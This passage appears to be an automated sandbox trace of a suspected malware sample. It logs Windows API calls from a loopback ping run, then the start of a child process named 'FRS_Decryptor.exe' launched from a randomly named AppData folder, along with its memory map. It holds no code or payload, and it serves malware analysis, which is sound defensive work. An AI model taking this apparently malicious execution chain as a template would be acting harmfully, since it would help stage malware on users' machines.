[0066.913] GetFileType (hFile=0x28) returned 0x2 [0066.913] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0066.913] GetLastError () returned 0x6 [0066.913] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0066.913] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0066.913] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf389a0 [0066.913] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf389a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0066.913] _fileno (_File=0x76ea4c28) returned 1 [0066.913] _write (in: _FileHandle=1, _Buf=0xf389a0*, _MaxCharCount=0x9 | out: _Buf=0xf389a0*) returned 9 [0066.914] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0066.914] _fileno (_File=0x76ea4c28) returned 1 [0066.914] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0066.914] LocalFree (hMem=0xf389a0) returned 0x0 [0066.914] LocalFree (hMem=0xf483e0) returned 0x0 [0066.914] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="菠ôß⟘\x94䰨盪✨") returned 0x9 [0066.914] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0066.914] _fileno (_File=0x76ea4c28) returned 1 [0066.914] _get_osfhandle (_FileHandle=1) returned 0x28 [0066.914] GetFileType (hFile=0x28) returned 0x2 [0066.914] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0066.914] GetLastError () returned 0x6 [0066.914] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0066.914] _fileno (_File=0x76ea4c28) returned 1 [0066.914] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0066.914] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0066.914] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38940 [0066.914] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf38940, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0066.914] _fileno (_File=0x76ea4c28) returned 1 [0066.914] _write (in: _FileHandle=1, _Buf=0xf38940*, _MaxCharCount=0x9 | out: _Buf=0xf38940*) returned 9 [0066.914] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0066.914] _fileno (_File=0x76ea4c28) returned 1 [0066.914] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0066.914] LocalFree (hMem=0xf38940) returned 0x0 [0066.914] LocalFree (hMem=0xf483e0) returned 0x0 [0066.914] Sleep (dwMilliseconds=0x3e8) [0067.927] IcmpSendEcho2Ex (in: IcmpHandle=0xf36b48, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xf3c200, RequestSize=0x20, RequestOptions=0xdfef6c, ReplyBuffer=0xf45270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xf45270) returned 0x1 [0067.928] InetNtopW (in: Family=2, pAddr=0xdfef5c, pStringBuf=0xdff084, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0067.928] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="羠ôß⛔\x94䰨盪✣") returned 0x16 [0067.928] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.928] _fileno (_File=0x76ea4c28) returned 1 [0067.928] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.928] GetFileType (hFile=0x28) returned 0x2 [0067.928] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0067.928] GetLastError () returned 0x6 [0067.928] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✣") returned 0x0 [0067.928] _fileno (_File=0x76ea4c28) returned 1 [0067.928] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0067.928] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0067.928] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xf48260 [0067.928] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xf48260, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0067.928] _fileno (_File=0x76ea4c28) returned 1 [0067.928] _write (in: _FileHandle=1, _Buf=0xf48260*, _MaxCharCount=0x16 | out: _Buf=0xf48260*) returned 22 [0067.928] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.928] _fileno (_File=0x76ea4c28) returned 1 [0067.928] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0067.928] LocalFree (hMem=0xf48260) returned 0x0 [0067.928] LocalFree (hMem=0xf47fa0) returned 0x0 [0067.928] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="菠ôß⛿\x94䰨盪✼") returned 0x9 [0067.928] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.928] _fileno (_File=0x76ea4c28) returned 1 [0067.928] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.928] GetFileType (hFile=0x28) returned 0x2 [0067.928] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0067.928] GetLastError () returned 0x6 [0067.928] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✼") returned 0x0 [0067.928] _fileno (_File=0x76ea4c28) returned 1 [0067.929] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0067.929] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0067.929] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a30 [0067.929] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="bytes=32 ", cchWideChar=-1, lpMultiByteStr=0xf38a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bytes=32 ", lpUsedDefaultChar=0x0) returned 10 [0067.929] _fileno (_File=0x76ea4c28) returned 1 [0067.929] _write (in: _FileHandle=1, _Buf=0xf38a30*, _MaxCharCount=0x9 | out: _Buf=0xf38a30*) returned 9 [0067.929] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.929] _fileno (_File=0x76ea4c28) returned 1 [0067.929] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0067.929] LocalFree (hMem=0xf38a30) returned 0x0 [0067.929] LocalFree (hMem=0xf483e0) returned 0x0 [0067.929] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0xdfeef4, nSize=0x0, Arguments=0xdfeef0 | out: lpBuffer="菠ôß➷\x94䰨盪✧") returned 0x9 [0067.929] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.929] _fileno (_File=0x76ea4c28) returned 1 [0067.929] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.929] GetFileType (hFile=0x28) returned 0x2 [0067.929] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb8 | out: lpMode=0xdfeeb8) returned 0 [0067.929] GetLastError () returned 0x6 [0067.929] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee1c, nSize=0x50 | out: lpBuffer="✧") returned 0x0 [0067.929] _fileno (_File=0x76ea4c28) returned 1 [0067.929] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0067.929] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0067.929] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a30 [0067.929] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="time<1ms ", cchWideChar=-1, lpMultiByteStr=0xf38a30, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="time<1ms ", lpUsedDefaultChar=0x0) returned 10 [0067.929] _fileno (_File=0x76ea4c28) returned 1 [0067.929] _write (in: _FileHandle=1, _Buf=0xf38a30*, _MaxCharCount=0x9 | out: _Buf=0xf38a30*) returned 9 [0067.929] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.929] _fileno (_File=0x76ea4c28) returned 1 [0067.929] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0067.929] LocalFree (hMem=0xf38a30) returned 0x0 [0067.929] LocalFree (hMem=0xf483e0) returned 0x0 [0067.929] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2728, dwLanguageId=0x0, lpBuffer=0xdfeef0, nSize=0x0, Arguments=0xdfeeec | out: lpBuffer="菠ôß⟘\x94䰨盪✨") returned 0x9 [0067.929] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.929] _fileno (_File=0x76ea4c28) returned 1 [0067.929] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.929] GetFileType (hFile=0x28) returned 0x2 [0067.929] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfeeb4 | out: lpMode=0xdfeeb4) returned 0 [0067.929] GetLastError () returned 0x6 [0067.929] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfee18, nSize=0x50 | out: lpBuffer="ß✨") returned 0x0 [0067.929] _fileno (_File=0x76ea4c28) returned 1 [0067.929] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0067.929] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0067.929] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0xf38a60 [0067.929] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="TTL=128\r\n", cchWideChar=-1, lpMultiByteStr=0xf38a60, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TTL=128\r\n", lpUsedDefaultChar=0x0) returned 10 [0067.929] _fileno (_File=0x76ea4c28) returned 1 [0067.930] _write (in: _FileHandle=1, _Buf=0xf38a60*, _MaxCharCount=0x9 | out: _Buf=0xf38a60*) returned 9 [0067.930] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.930] _fileno (_File=0x76ea4c28) returned 1 [0067.930] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0067.930] LocalFree (hMem=0xf38a60) returned 0x0 [0067.930] LocalFree (hMem=0xf483e0) returned 0x0 [0067.930] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xdfee78, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0067.930] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0xdfee4c, nSize=0x0, Arguments=0xdfee48 | out: lpBuffer="菠ôß᧰\x94䰨盪❏") returned 0x5e [0067.930] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.930] _fileno (_File=0x76ea4c28) returned 1 [0067.930] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.930] GetFileType (hFile=0x28) returned 0x2 [0067.930] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfee10 | out: lpMode=0xdfee10) returned 0 [0067.930] GetLastError () returned 0x6 [0067.930] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfed74, nSize=0x50 | out: lpBuffer="❏") returned 0x0 [0067.930] _fileno (_File=0x76ea4c28) returned 1 [0067.930] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0067.930] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0067.930] LocalAlloc (uFlags=0x40, uBytes=0x5f) returned 0xf484a8 [0067.930] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", cchWideChar=-1, lpMultiByteStr=0xf484a8, cbMultiByte=95, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPing statistics for 127.0.0.1:\r\n Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),\r\n", lpUsedDefaultChar=0x0) returned 95 [0067.930] _fileno (_File=0x76ea4c28) returned 1 [0067.930] _write (in: _FileHandle=1, _Buf=0xf484a8*, _MaxCharCount=0x5e | out: _Buf=0xf484a8*) returned 94 [0067.930] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.930] _fileno (_File=0x76ea4c28) returned 1 [0067.930] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0067.930] LocalFree (hMem=0xf484a8) returned 0x0 [0067.930] LocalFree (hMem=0xf483e0) returned 0x0 [0067.930] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0xdfee58, nSize=0x0, Arguments=0xdfee54 | out: lpBuffer="菠ôßᨧ\x94䰨盪❓") returned 0x61 [0067.930] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.930] _fileno (_File=0x76ea4c28) returned 1 [0067.930] _get_osfhandle (_FileHandle=1) returned 0x28 [0067.930] GetFileType (hFile=0x28) returned 0x2 [0067.930] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xdfee1c | out: lpMode=0xdfee1c) returned 0 [0067.930] GetLastError () returned 0x6 [0067.930] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xdfed80, nSize=0x50 | out: lpBuffer="ß❓") returned 0x0 [0067.931] _fileno (_File=0x76ea4c28) returned 1 [0067.931] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0067.931] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 98 [0067.931] LocalAlloc (uFlags=0x40, uBytes=0x62) returned 0xf484b0 [0067.931] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", cchWideChar=-1, lpMultiByteStr=0xf484b0, cbMultiByte=98, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 0ms, Average = 0ms\r\n", lpUsedDefaultChar=0x0) returned 98 [0067.931] _fileno (_File=0x76ea4c28) returned 1 [0067.931] _write (in: _FileHandle=1, _Buf=0xf484b0*, _MaxCharCount=0x61 | out: _Buf=0xf484b0*) returned 97 [0067.931] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0067.931] _fileno (_File=0x76ea4c28) returned 1 [0067.931] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0067.931] LocalFree (hMem=0xf484b0) returned 0x0 [0067.931] LocalFree (hMem=0xf483e0) returned 0x0 [0067.931] IcmpCloseHandle (IcmpHandle=0xf36b48) returned 1 [0067.931] LocalFree (hMem=0xf3c200) returned 0x0 [0067.931] LocalFree (hMem=0xf45270) returned 0x0 [0067.931] WSACleanup () returned 0 [0067.931] exit (_Code=0) Thread: id = 75 os_tid = 0xb34 Thread: id = 80 os_tid = 0x96c Process: id = "40" image_name = "frs_decryptor.exe" filename = "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe" page_root = "0x61a73000" os_pid = "0x94c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe " cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1864 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1865 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1866 start_va = 0x40000 end_va = 0x4efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1867 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1868 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1869 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1870 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1871 start_va = 0x400000 end_va = 0x452fff entry_point = 0x400000 region_type = mapped_file name = "frs_decryptor.exe" filename = "\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe" (normalized: "c:\\users\\5jghkoaofdp\\appdata\\local\\qb1143663.0f\\frs_decryptor.exe") Region: id = 1872 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1873 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1874 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1875 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1876 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1877 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1878 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1879 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1880 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 1881 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1882 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1883 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1884 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1980 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1981 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1982 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1983 start_va = 0x1b0000 end_va = 0x22dfff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1984 start_va = 0x230000 end_va = 0x230fff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1985 start_va = 0x280000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1986 start_va = 0x540000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 1987 start_va = 0x640000 end_va = 0x7c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 1988 start_va = 0x7d0000 end_va = 0x950fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1989 start_va = 0x960000 end_va = 0x1d5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 1990 start_va = 0x749c0000 end_va = 0x74a58fff entry_point = 0x749c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 1991 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1992 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1993 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1994 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1995 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1996 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1997 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1998 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1999 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2000 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2001 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2002 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2003 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2004 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2005 start_va = 0x1d60000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Thread: id = 82 os_tid = 0x510 [0068.362] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0068.362] GetKeyboardType (nTypeFlag=0) returned 4 [0068.362] GetCommandLineA () returned="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe " [0068.362] GetStartupInfoA (in: lpStartupInfo=0x18fed0 | out: lpStartupInfo=0x18fed0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5JgHKoaOfdp\\AppData\\Local\\qb1143663.0F\\FRS_Decryptor.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0068.362] GetACP () returned 0x4e4 